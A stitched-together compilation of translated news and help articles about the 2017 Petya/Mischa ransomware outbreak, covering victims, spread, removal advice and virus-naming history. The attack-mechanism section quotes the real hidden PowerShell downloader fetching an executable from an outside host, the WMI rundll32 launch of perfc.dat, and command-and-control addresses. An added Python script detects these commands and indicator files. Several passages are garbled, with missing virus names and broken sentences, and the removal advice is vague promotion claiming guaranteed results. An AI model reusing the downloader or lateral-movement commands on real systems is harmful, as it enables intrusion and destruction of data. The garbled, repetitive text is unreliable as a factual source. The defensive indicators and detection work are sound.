
The Petya virus has returned with Misha. Similar to Petya, friend Misha: what is known about the new ransomware virus.

Illustration copyright PA. Image caption: According to experts, fighting the new ransomware is more difficult than WannaCry.

On June 27, ransomware locked computers and encrypted files at dozens of companies around the world.

It is reported that Ukrainian companies suffered the most - the virus infected the computers of large companies, government agencies and infrastructure facilities.

The virus demands $300 in Bitcoin from victims to decrypt files.

The BBC Russian service answers the main questions about the new threat.

Who was hurt?

The spread of the virus began in Ukraine. The Boryspil airport, some regional divisions of Ukrenergo, chain stores, banks, media and telecommunications companies were affected. Computers in the Ukrainian government also went down.

Following this, it was the turn of companies in Russia: Rosneft, Bashneft, Mondelez International, Mars, Nivea and others also became victims of the virus.

How does the virus work?

Experts have not yet reached a consensus on the origin of the new virus. Group-IB and Positive Technologies see it as a variant of the 2016 Petya virus.

"This ransomware uses both hacking methods and utilities and standard system administration utilities," comments Elmar Nabigaev, head of the information security threat response department at Positive Technologies. "All this guarantees a high speed of spread within the network and the massiveness of the epidemic as a whole (if at least one personal computer). The result is complete computer inoperability and data encryption."

The Romanian company Bitdefender sees more in common with the GoldenEye virus, in which Petya is combined with another piece of malware called Misha. The advantage of the latter is that it does not need the future victim to grant administrator rights in order to encrypt files, but obtains them on its own.

Brian Cambell from Fujitsu and a number of other experts believe that the new virus uses a modified version of the EternalBlue program stolen from the US National Security Agency.

After the publication of this program by hackers The Shadow Brokers in April 2017, the WannaCry ransomware virus created on its basis spread all over the world.

Using Windows vulnerabilities, this program allows the virus to spread to computers throughout a corporate network. The original Petya was sent by email under the guise of a resume and could only infect the computer on which the resume was opened.

Kaspersky Lab told Interfax that the ransomware virus does not belong to previously known families of malicious software.

“Kaspersky Lab software products detect this malware as UDS:DangerousObject.Multi.Generic,” noted Vyacheslav Zakorzhevsky, head of the anti-virus research department at Kaspersky Lab.

In general, if you call the new virus by its Russian name, you need to keep in mind that in appearance it looks more like Frankenstein’s monster, since it is assembled from several malicious programs. It is known for certain that the virus was born on June 18, 2017.

Image caption: The virus demands $300 to decrypt files and unlock your computer.

Cooler than WannaCry?

It took WannaCry just a few days in May 2017 to become the largest cyberattack of its kind in history. Will the new ransomware virus surpass its recent predecessor?

In less than a day, the attackers received 2.1 bitcoins from their victims - about 5 thousand dollars. WannaCry collected 7 bitcoins during the same period.

At the same time, according to Elmar Nabigaev from Positive Technologies, it is more difficult to fight the new ransomware.

“In addition to exploiting [the Windows vulnerability], this threat is also spread through operating system accounts stolen using special hacking tools,” the expert noted.

How to fight the virus?

As a preventative measure, experts advise installing updates for operating systems on time and checking files received by email.

Advanced administrators are advised to temporarily disable the Server Message Block (SMB) network transfer protocol.

If your computers are infected, under no circumstances should you pay the attackers. There is no guarantee that once they receive payment, they will decrypt the files rather than demand more.

All that remains is to wait for a decryption program: in the case of WannaCry, it took Adrien Guinet, a specialist from the French company Quarkslab, a week to create one.

The first ransomware, AIDS (PC Cyborg), was written by biologist Joseph Popp in 1989. It hid directories and encrypted file names, demanding a payment of $189 for a "license renewal" to an account in Panama. Popp distributed his brainchild on floppy disks sent by regular mail, making about 20 thousand shipments in total. Popp was detained while trying to cash a check, but avoided trial: in 1991 he was declared insane.

A few months ago, we and other IT security specialists discovered a new piece of malware, Petya (Win32.Trojan-Ransom.Petya.A). In the classical sense it was not an encryptor: the virus simply blocked access to certain types of files and demanded a ransom. The virus modified the boot record on the hard drive, forcibly rebooted the PC and displayed a message saying that “the data is encrypted, spend your money on decryption.” In general, the standard scheme of encryption viruses, except that the files were NOT actually encrypted. Most popular antiviruses began identifying and removing Win32.Trojan-Ransom.Petya.A a few weeks after its appearance, and instructions for manual removal also appeared. Why do we think that Petya is not a classic ransomware? This virus modifies the Master Boot Record and prevents the OS from loading, and also encrypts the Master File Table. It does not encrypt the files themselves.

However, a few weeks ago a more sophisticated virus, Mischa, appeared, apparently written by the same scammers. This virus ENCRYPTS files and requires you to pay $500 - $875 for decryption (1.5 – 1.8 bitcoins in different versions). Instructions for “decryption” and payment for it are stored in the files YOUR_FILES_ARE_ENCRYPTED.HTML and YOUR_FILES_ARE_ENCRYPTED.TXT.

Image caption: Mischa virus – contents of the YOUR_FILES_ARE_ENCRYPTED.HTML file

Now, in fact, hackers infect users’ computers with two pieces of malware: Petya and Mischa. The first one needs administrator rights on the system. That is, if a user refuses to give Petya admin rights or manually deletes this malware, Mischa steps in. This virus does not require administrator rights; it is a classic encryptor and actually encrypts files using the strong AES algorithm, without making any changes to the Master Boot Record or the file table on the victim’s hard drive.

The Mischa malware encrypts not only standard file types (videos, pictures, presentations, documents), but also .exe files. The only directories the virus does not touch are \Windows, \$Recycle.Bin, \Microsoft, \Mozilla Firefox, \Opera, \Internet Explorer, \Temp, \Local, \LocalLow and \Chrome.

Infection occurs mainly through email, where a letter arrives with an attached file: the virus installer. It can be disguised as a letter from the Tax Service or from your accountant, as attached receipts and purchase invoices, etc. Pay attention to the file extensions in such letters: if the attachment is an executable file (.exe), there is a high probability that it is a container for the Petya\Mischa virus. And if the modification of the malware is recent, your antivirus may not react.

Update 06/30/2017: On June 27, a modified version of the Petya virus (Petya.A) massively attacked users in Ukraine. The effect of this attack was enormous and the economic damage has not yet been calculated. In one day, the work of dozens of banks, retail chains, government agencies and enterprises of various forms of ownership was paralyzed. The virus spread primarily through a vulnerability in the Ukrainian financial reporting system MeDoc, delivered with the latest automatic update of that software. In addition, the virus has affected countries such as Russia, Spain, Great Britain, France and Lithuania.

Remove Petya and Mischa virus using an automatic cleaner

An exceptionally effective method of dealing with malware in general and ransomware in particular. The use of a proven protective suite guarantees thorough detection of any viral components and their complete removal with one click. Please note that we are talking about two different processes: removing the infection and restoring the files on your PC. However, the threat certainly needs to be removed, since there is information that it is used to introduce other computer Trojans.

  1. After starting the software, click the Start Computer Scan button.
  2. The installed software will provide a report on the threats detected during scanning. To remove all detected threats, select the Fix Threats option. The malware in question will be completely removed.

Restore access to encrypted files

As noted, the Mischa ransomware locks files using a strong encryption algorithm so that encrypted data cannot be restored with a wave of a magic wand - short of paying an unheard-of ransom amount (sometimes reaching up to $1,000). But some methods can really be a lifesaver that will help you recover important data. Below you can familiarize yourself with them.

Automatic file recovery program (decryptor)

A very unusual circumstance is known. This infection erases the original files in unencrypted form, so the encryption performed for extortion purposes actually targets copies of them. This makes it possible to use software for recovering erased objects, even though the reliability of their removal is supposedly guaranteed. It is highly recommended to try the file recovery procedure; its effectiveness is beyond doubt.

Volume shadow copies

The approach relies on the Windows file backup procedure that runs at each restore point. An important condition for this method to work: the “System Restore” function must have been enabled before infection. However, any changes made to a file after the restore point will not appear in the restored version of the file.

Backup

This is the best among all non-ransom methods. If the procedure for backing up data to an external server was used before the ransomware attack on your computer, to restore encrypted files you simply need to enter the appropriate interface, select necessary files and start the data recovery mechanism from the backup. Before performing the operation, you must make sure that the ransomware is completely removed.

Check for possible presence of residual components of the Petya and Mischa ransomware

Manual cleaning risks missing individual pieces of the ransomware that could escape removal as hidden operating system objects or registry items. To eliminate the risk of partial retention of individual malicious elements, scan your computer using a reliable security software package that specializes in malicious software.

There is a new ransomware virus epidemic on the Internet. The malware has practically blocked the work of dozens of large companies, demanding just under $400 to decrypt the hard drive of each workstation.

The panic generated by the new epidemic created information chaos: first, anti-virus analysts announced the second coming of WannaCry, then the malware was identified as a complex of newly assembled encryption viruses “Petya” and “Misha”. At the moment it is clear that if the virus was based on Petya, it was heavily modified.

The distribution model is partly similar to WannaCry - an exploit for the MS17-010 vulnerability is used, which was enhanced by social engineering using a vulnerability in MS Word. Infection occurs after a user opens an email attachment or downloads a file that exploits the CVE-2017-0199 vulnerability published in April 2017. And distribution to other computers on the network is already ensured by a whole set of techniques:

  • stealing user passwords or using active sessions to access other network nodes (code from the Mimikatz utility is used);
  • through a vulnerability in SMB (CVE-2017-0144, MS17-010), using the same famous EternalBlue exploit that was successfully used in WannaCry.

The malware uses stolen accounts to copy its body into admin$ shares and launches it using the legitimate PsExec utility, which is designed for remote computer control.

The developer of the well-known Mimikatz program confirmed that its modified code is used to extract passwords.

Code for using the WMI interface to run the installation was also published on the Microsoft blog.

Infection via the SMB vector uses the CVE-2017-0144 vulnerability, similar to the technique used in WannaCry.

But the encryption model has changed significantly compared to WannaCry. On penetrating the computer, the virus infects the MBR (master boot record) of the system and encrypts the first few blocks of the hard drive, including the Master File Table, making the user's entire HDD inaccessible, not just individual files, as ransomware viruses usually do.

It’s definitely not worth paying a ransom to extortionists, and not only for ethical reasons: virus analysts have come to the conclusion that decrypting files after paying a ransom is in principle impossible. This function is simply not included in the malware. In fact, this is not an epidemic of ransomware, but an epidemic of a wiper virus that destroys data.

According to media reports in Russia, the greatest problems were encountered in the Rosneft corporation; the main websites of the corporation and the Bashneft website were disabled for a long time.

Massive infections have been recorded in France, Spain, Russia, and CIS countries. In Ukraine, dozens of government and commercial organizations have been affected by the virus.

Who needs it?

Since the recovery mechanism was not included in the code, there are three possible options for motivating attackers. Either they wanted to disguise the targeted destruction of someone’s specific data as a mass epidemic, or they wanted to make money without initially intending to restore anything. The least likely option is cyber vandalism. A virus is a serious product, and it would be wiser to spend the effort to create it on something that brings in money. Vandals were common in the 1990s, when it was fashionable to break systems for fame, but they are now extremely rare.

As a result, the main beneficiaries of the epidemics of the last 2 months were, apparently, the group The Shadow Brokers, which distributed the EternalBlue exploit. The extortionists themselves collected relatively small amounts of money, several orders of magnitude less than the damage caused by the epidemic. The epidemics have become excellent advertising for The Shadow Brokers, who claim that they are ready to sell information about other exploits from the NSA archive. After all, EternalBlue is just one of dozens of exploits stolen from the agency in August 2016.

Attack Mechanism

An attacker can send files or links to them (at the initial stage of the epidemic these were the files Petya.apx, myguy.exe, myguy.xls and Order-[any date].doc), through which a workstation running Windows is infected. For example, when the file Order-[any date].doc is opened, the server 84.200.16.242 is contacted on port 80 and an .xls file is downloaded:

powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile("h11p://french-cooking.com/myguy.exe", "%APPDATA%\10807.exe");" (PID: [process id], Additional Context: (System.Net.WebClient).DownloadFile("h11p://french-cooking.com/myguy.exe", "%APPDATA%\[random number].exe") ;)

The malware then tries to connect to servers 111.90.139.247:80 and COFFEINOFFICE.XYZ:80, which are possibly command and control servers.

Indicators of compromise are the presence of files:

C:\Windows\perfc.dat
C:\myguy.xls.hta

After establishing itself on the host, the malware scans for other Windows machines on the network and spreads through the vulnerabilities described in MS17-010 (the same ones used by WannaCry) on ports tcp:135, tcp:139, tcp:445 and tcp:1024-1035.

Distribution can also occur by executing the command:

Remote WMI: process call create "C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\perfc.dat\" #1"


The infection spread diagram is taken from blog.kryptoslogic.com

How to avoid infection?

1. Addresses contacted by the malware (see the attack mechanism above):
french-cooking.com:80
84.200.16.242:80
111.90.139.247:80
COFFEINOFFICE.XYZ:80

2. File names used at the initial stage of the epidemic:
Petya.apx, myguy.exe, myguy.xls, Order-[any date].doc

3. Install patches

4. Configure IPS to block exploits for MS17-010

5. To protect hosts that have not yet been infected, you can create a file c:\windows\perfc without an extension. Such nodes are not infected.
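As an added example (not code from any of the articles compiled here), a Python triage script that applies the attack mechanism and this list from the defender's side: it matches process-creation log lines against the quoted hidden PowerShell downloader, the WMI rundll32 launch of perfc.dat and PsExec lateral movement, checks a system-drive root for the two IoC files, and creates the c:\windows\perfc vaccine file. The log line format, the exact psexec command line and the read-only attribute on the vaccine file are assumptions of this example; the sample log lines are constructed.

```python
import os
import re
import stat
import tempfile

# Detection rules derived from the commands quoted in the article: the hidden
# PowerShell downloader, the WMI "process call create" launch of perfc.dat via
# rundll32 export #1, and PsExec lateral movement through admin$ shares.
RULES = {
    "powershell-downloader": re.compile(
        r'powershell(\.exe)?\s.*-WindowStyle\s+Hidden.*DownloadFile\(', re.I),
    "wmi-rundll32-perfc": re.compile(
        r'process\s+call\s+create.*rundll32(\.exe)?.*perfc\.dat\\?"?\s+#1', re.I),
    "psexec-admin-share": re.compile(
        r'psexec(\.exe)?\s.*(admin\$|perfc\.dat)', re.I),
}

# Constructed process-creation log lines (the format and the psexec line are
# assumptions of this example; the "h11p" defanging is kept as the article quotes it).
SAMPLE_LOG = r"""
host1 CommandLine: powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile("h11p://french-cooking.com/myguy.exe", "%APPDATA%\10807.exe")
host2 CommandLine: wmic.exe process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\perfc.dat\" #1"
host3 CommandLine: psexec.exe \\host4 -accepteula -s -d C:\Windows\System32\rundll32.exe C:\Windows\perfc.dat,#1
host4 CommandLine: notepad.exe C:\Users\alice\notes.txt
"""

def scan_log(text):
    """Return (host, rule_name) pairs for every log line matching a rule."""
    hits = []
    for line in text.splitlines():
        host, sep, cmd = line.partition(" CommandLine: ")
        if not sep:
            continue  # skip blank or malformed lines
        for name, rx in RULES.items():
            if rx.search(cmd):
                hits.append((host, name))
    return hits

# File indicators of compromise named in the article, relative to the system
# drive root; the vaccine is c:\windows\perfc with no extension.
IOC_FILES = [os.path.join("Windows", "perfc.dat"), "myguy.xls.hta"]
VACCINE = os.path.join("Windows", "perfc")

def check_host(root):
    """List the IoC files present under root (C:\\ on a real host, a temp dir here)."""
    return [p for p in IOC_FILES if os.path.isfile(os.path.join(root, p))]

def create_vaccine(root):
    """Create the empty perfc file if absent and report whether it now exists.
    Making it read-only is an addition of this example, not a step from the article."""
    path = os.path.join(root, VACCINE)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    if not os.path.exists(path):
        open(path, "w").close()
        os.chmod(path, stat.S_IREAD)
    return os.path.isfile(path)

def demo_host_check():
    """Stand-alone run against a temporary directory standing in for C:\\."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "Windows"))
    open(os.path.join(root, "myguy.xls.hta"), "w").close()  # plant one IoC
    return {"iocs": check_host(root), "vaccinated": create_vaccine(root)}

if __name__ == "__main__":
    for host, rule in scan_log(SAMPLE_LOG):
        print(f"{host}: {rule}")
    print(demo_host_check())
```

On a real host, point check_host and create_vaccine at the system drive root instead of the temporary directory and feed scan_log the command lines exported from your process-creation telemetry.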

A brief excursion into the history of malware naming.


Petya.A virus logo

On June 27, at least 80 Russian and Ukrainian companies were attacked by the Petya.A virus. The program blocked information on the computers of departments and enterprises and, like the well-known ransomware virus, demanded bitcoins from users.

Malicious programs are usually named by employees of antivirus companies. The exceptions are those encryptors, ransomware, destroyers and identity thieves, which, in addition to computer infections, cause media epidemics - increased hype in the media and active discussion on the network.

However, the Petya.A virus is a representative of a new generation. The name by which it introduces itself is part of the developers’ marketing strategy, aimed at increasing its recognition and popularity on the darknet market.

Subcultural phenomenon

In the days when there were few computers and not all of them were connected to each other, self-propagating programs (not yet called viruses) already existed. One of the first of these was , which jokingly greeted the user and offered to catch it and delete it. Next came Cookie Monster, which demanded that the user “give it a cookie” by typing the word “cookie.”

Early malware also had a sense of humor, although it wasn't always in their names. Thus, Richard Scrant, designed for the Apple-2 computer, read a poem to the victim once every 50 computer startups, and the names of the viruses, often hidden in the code and not displayed, referred to jokes and subcultural words common among geeks of that time. They could be associated with metal band names, popular literature, and tabletop role-playing games.

At the end of the 20th century, the creators of viruses did not hide much; moreover, when a program got out of control, they often tried to take part in eliminating the harm it caused. This was the case with the Pakistani one and with the destructive one created by the future co-founder of the Y Combinator business incubator.

One of the Russian viruses mentioned by Evgeniy Kaspersky in his 1992 book “Computer Viruses in MS-DOS” was Condom-1581, a program that from time to time showed the victim a presentation dedicated to the problem of clogging the world's oceans with human waste products.

Geography and calendar

In 1987, the Jerusalem virus, also known as the Israeli Virus, was named after the place where it was first discovered, and its alternative name Black Friday was due to the fact that it would activate and delete executable files if the 13th of the month fell on a Friday.

The Michelangelo virus, which caused panic in the media in the spring of 1992, was also named according to the calendar principle. Then John McAfee, later famous for creating one of the most intrusive antiviruses, during a Sydney cybersecurity conference, told journalists and the public: “If you boot an infected system on March 6, all the data on the hard drive will be corrupted.” What does Michelangelo have to do with this? March 6 was the Italian artist’s birthday. However, the horrors that McAfee predicted ended up being wildly exaggerated.

Functionality

The capabilities of a virus and its specific features often serve as the basis for its name. In 1990, one of the first polymorphic viruses was named Chameleon, and a virus with wide abilities to hide its presence (and therefore belonging to the category of stealth viruses) was named Frodo, hinting at the hero of “The Lord of the Rings” and the Ring that hides him from the eyes of others. And, for example, the OneHalf virus of 1994 got its name because it showed its aggression only after infecting half of the disk of the attacked device.

Service titles

Most viruses have long been named in laboratories, where analysts take them apart.

Usually these are boring serial names and general “family” names that describe the category of the virus, what systems it attacks and what it does with them (like Win32.HLLP.DeTroie). However, sometimes, when hints left by the developers are revealed in the program code, viruses gain a little personality. This is how, for example, the MyDoom and KooKoo viruses appeared.

However, this rule does not always work - for example, the Stuxnet virus, which stopped uranium enrichment centrifuges in Iran, was not called Myrtus, although this word (“myrtle”) in the code was almost a direct hint at the participation of Israeli intelligence services in its development. In this case, the name that had already become known to the general public, assigned to the virus in the first stages of its discovery, won.

Tasks

It often happens that viruses that require a lot of attention and effort to study receive beautiful names from antivirus companies that are easier to say and write down. This happened with Red October, diplomatic correspondence and data that could affect international relations, as well as with IceFog, large-scale industrial espionage.

File extension

Another popular way of naming is by the extension that the virus assigns to infected files. Thus, one of the “military” viruses, Duqu, was named not after Count Dooku from Star Wars, but after the ~DQ prefix that marked the files it created.

This is how this spring's sensational WannaCry virus got its name: it marks the data it encrypts with the .wncry extension.

The virus's earlier name, Wanna Decrypt0r, didn’t catch on: it sounded worse and had different spellings. Not everyone bothered to put a "0" in place of the "o".

“You have become a victim of the Petya ransomware virus”

This is exactly what today's most discussed malware says when it finishes encrypting files on the attacked computer. The Petya.A virus not only has a recognizable name, but also a logo in the form of a pirate skull and crossbones, and a whole marketing campaign. Spotted together with its brother “Misha”, the virus attracted the attention of analysts precisely because of this.

From a subcultural phenomenon, having gone through a period when this kind of “hacking” required quite serious technical knowledge, viruses have turned into a weapon of cyber mugging. Now they have to play by market rules, and whoever gets more attention brings bigger profits to their developers.
